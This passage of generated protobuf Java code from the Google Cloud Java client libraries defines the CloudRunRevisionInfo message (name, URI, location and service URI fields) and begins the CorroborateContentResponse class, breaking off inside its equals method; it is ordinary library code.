private CloudRunRevisionInfo(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CloudRunRevisionInfo() { displayName_ = ""; uri_ = ""; location_ = ""; serviceUri_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CloudRunRevisionInfo(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.class, com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.Builder.class); } public static final int DISPLAY_NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object displayName_ = ""; /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The displayName. */ @java.lang.Override public java.lang.String getDisplayName() { java.lang.Object ref = displayName_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); displayName_ = s; return s; } } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The bytes for displayName. 
*/ @java.lang.Override public com.google.protobuf.ByteString getDisplayNameBytes() { java.lang.Object ref = displayName_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); displayName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int URI_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object uri_ = ""; /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The uri. */ @java.lang.Override public java.lang.String getUri() { java.lang.Object ref = uri_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); uri_ = s; return s; } } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The bytes for uri. */ @java.lang.Override public com.google.protobuf.ByteString getUriBytes() { java.lang.Object ref = uri_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); uri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int LOCATION_FIELD_NUMBER = 4; @SuppressWarnings("serial") private volatile java.lang.Object location_ = ""; /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The location. */ @java.lang.Override public java.lang.String getLocation() { java.lang.Object ref = location_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); location_ = s; return s; } } /** * * * <pre> * Location in which this revision is deployed. 
* </pre> * * <code>string location = 4;</code> * * @return The bytes for location. */ @java.lang.Override public com.google.protobuf.ByteString getLocationBytes() { java.lang.Object ref = location_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); location_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int SERVICE_URI_FIELD_NUMBER = 5; @SuppressWarnings("serial") private volatile java.lang.Object serviceUri_ = ""; /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The serviceUri. */ @java.lang.Override public java.lang.String getServiceUri() { java.lang.Object ref = serviceUri_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); serviceUri_ = s; return s; } } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The bytes for serviceUri. 
*/ @java.lang.Override public com.google.protobuf.ByteString getServiceUriBytes() { java.lang.Object ref = serviceUri_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); serviceUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(displayName_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, displayName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(uri_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, uri_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(location_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 4, location_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(serviceUri_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 5, serviceUri_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(displayName_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, displayName_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(uri_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, uri_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(location_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(4, location_); } if 
(!com.google.protobuf.GeneratedMessageV3.isStringEmpty(serviceUri_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(5, serviceUri_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo)) { return super.equals(obj); } com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo other = (com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) obj; if (!getDisplayName().equals(other.getDisplayName())) return false; if (!getUri().equals(other.getUri())) return false; if (!getLocation().equals(other.getLocation())) return false; if (!getServiceUri().equals(other.getServiceUri())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + DISPLAY_NAME_FIELD_NUMBER; hash = (53 * hash) + getDisplayName().hashCode(); hash = (37 * hash) + URI_FIELD_NUMBER; hash = (53 * hash) + getUri().hashCode(); hash = (37 * hash) + LOCATION_FIELD_NUMBER; hash = (53 * hash) + getLocation().hashCode(); hash = (37 * hash) + SERVICE_URI_FIELD_NUMBER; hash = (53 * hash) + getServiceUri().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseDelimitedFrom( java.io.InputStream 
input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * For display only. Metadata associated with a Cloud Run revision. 
* </pre> * * Protobuf type {@code google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfoOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.class, com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.Builder.class); } // Construct using com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; displayName_ = ""; uri_ = ""; location_ = ""; serviceUri_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.networkmanagement.v1beta1.TraceProto .internal_static_google_cloud_networkmanagement_v1beta1_CloudRunRevisionInfo_descriptor; } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo getDefaultInstanceForType() { return com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.getDefaultInstance(); } @java.lang.Override public 
com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo build() { com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo buildPartial() { com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo result = new com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.displayName_ = displayName_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.uri_ = uri_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.location_ = location_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.serviceUri_ = serviceUri_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message 
other) { if (other instanceof com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) { return mergeFrom((com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo other) { if (other == com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo.getDefaultInstance()) return this; if (!other.getDisplayName().isEmpty()) { displayName_ = other.displayName_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getUri().isEmpty()) { uri_ = other.uri_; bitField0_ |= 0x00000002; onChanged(); } if (!other.getLocation().isEmpty()) { location_ = other.location_; bitField0_ |= 0x00000004; onChanged(); } if (!other.getServiceUri().isEmpty()) { serviceUri_ = other.serviceUri_; bitField0_ |= 0x00000008; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { displayName_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { uri_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 34: { location_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 34 case 42: { serviceUri_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000008; break; } // case 42 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch 
(com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object displayName_ = ""; /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The displayName. */ public java.lang.String getDisplayName() { java.lang.Object ref = displayName_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); displayName_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return The bytes for displayName. */ public com.google.protobuf.ByteString getDisplayNameBytes() { java.lang.Object ref = displayName_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); displayName_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @param value The displayName to set. * @return This builder for chaining. */ public Builder setDisplayName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } displayName_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @return This builder for chaining. */ public Builder clearDisplayName() { displayName_ = getDefaultInstance().getDisplayName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Name of a Cloud Run revision. * </pre> * * <code>string display_name = 1;</code> * * @param value The bytes for displayName to set. * @return This builder for chaining. 
*/ public Builder setDisplayNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); displayName_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object uri_ = ""; /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The uri. */ public java.lang.String getUri() { java.lang.Object ref = uri_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); uri_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return The bytes for uri. */ public com.google.protobuf.ByteString getUriBytes() { java.lang.Object ref = uri_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); uri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @param value The uri to set. * @return This builder for chaining. */ public Builder setUri(java.lang.String value) { if (value == null) { throw new NullPointerException(); } uri_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @return This builder for chaining. */ public Builder clearUri() { uri_ = getDefaultInstance().getUri(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * URI of a Cloud Run revision. * </pre> * * <code>string uri = 2;</code> * * @param value The bytes for uri to set. * @return This builder for chaining. 
*/ public Builder setUriBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); uri_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private java.lang.Object location_ = ""; /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The location. */ public java.lang.String getLocation() { java.lang.Object ref = location_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); location_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return The bytes for location. */ public com.google.protobuf.ByteString getLocationBytes() { java.lang.Object ref = location_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); location_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @param value The location to set. * @return This builder for chaining. */ public Builder setLocation(java.lang.String value) { if (value == null) { throw new NullPointerException(); } location_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @return This builder for chaining. */ public Builder clearLocation() { location_ = getDefaultInstance().getLocation(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Location in which this revision is deployed. * </pre> * * <code>string location = 4;</code> * * @param value The bytes for location to set. 
* @return This builder for chaining. */ public Builder setLocationBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); location_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private java.lang.Object serviceUri_ = ""; /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The serviceUri. */ public java.lang.String getServiceUri() { java.lang.Object ref = serviceUri_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); serviceUri_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return The bytes for serviceUri. */ public com.google.protobuf.ByteString getServiceUriBytes() { java.lang.Object ref = serviceUri_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); serviceUri_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @param value The serviceUri to set. * @return This builder for chaining. */ public Builder setServiceUri(java.lang.String value) { if (value == null) { throw new NullPointerException(); } serviceUri_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @return This builder for chaining. 
*/ public Builder clearServiceUri() { serviceUri_ = getDefaultInstance().getServiceUri(); bitField0_ = (bitField0_ & ~0x00000008); onChanged(); return this; } /** * * * <pre> * URI of Cloud Run service this revision belongs to. * </pre> * * <code>string service_uri = 5;</code> * * @param value The bytes for serviceUri to set. * @return This builder for chaining. */ public Builder setServiceUriBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); serviceUri_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) } // @@protoc_insertion_point(class_scope:google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo) private static final com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo(); } public static com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CloudRunRevisionInfo> PARSER = new com.google.protobuf.AbstractParser<CloudRunRevisionInfo>() { @java.lang.Override public CloudRunRevisionInfo parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { 
throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CloudRunRevisionInfo> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CloudRunRevisionInfo> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.networkmanagement.v1beta1.CloudRunRevisionInfo getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,826
java-aiplatform/proto-google-cloud-aiplatform-v1beta1/src/main/java/com/google/cloud/aiplatform/v1beta1/CorroborateContentResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1beta1/vertex_rag_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1beta1; /** * * * <pre> * Response message for CorroborateContent. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1beta1.CorroborateContentResponse} */ public final class CorroborateContentResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) CorroborateContentResponseOrBuilder { private static final long serialVersionUID = 0L; // Use CorroborateContentResponse.newBuilder() to construct. 
private CorroborateContentResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CorroborateContentResponse() { claims_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new CorroborateContentResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.class, com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.Builder.class); } private int bitField0_; public static final int CORROBORATION_SCORE_FIELD_NUMBER = 1; private float corroborationScore_ = 0F; /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return Whether the corroborationScore field is set. */ @java.lang.Override public boolean hasCorroborationScore() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return The corroborationScore. 
*/ @java.lang.Override public float getCorroborationScore() { return corroborationScore_; } public static final int CLAIMS_FIELD_NUMBER = 2; @SuppressWarnings("serial") private java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> claims_; /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> getClaimsList() { return claims_; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> getClaimsOrBuilderList() { return claims_; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public int getClaimsCount() { return claims_.size(); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.Claim getClaims(int index) { return claims_.get(index); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder getClaimsOrBuilder(int index) { return claims_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (((bitField0_ & 0x00000001) != 0)) { output.writeFloat(1, corroborationScore_); } for (int i = 0; i < claims_.size(); i++) { output.writeMessage(2, claims_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeFloatSize(1, corroborationScore_); } for (int i = 0; i < claims_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, claims_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final 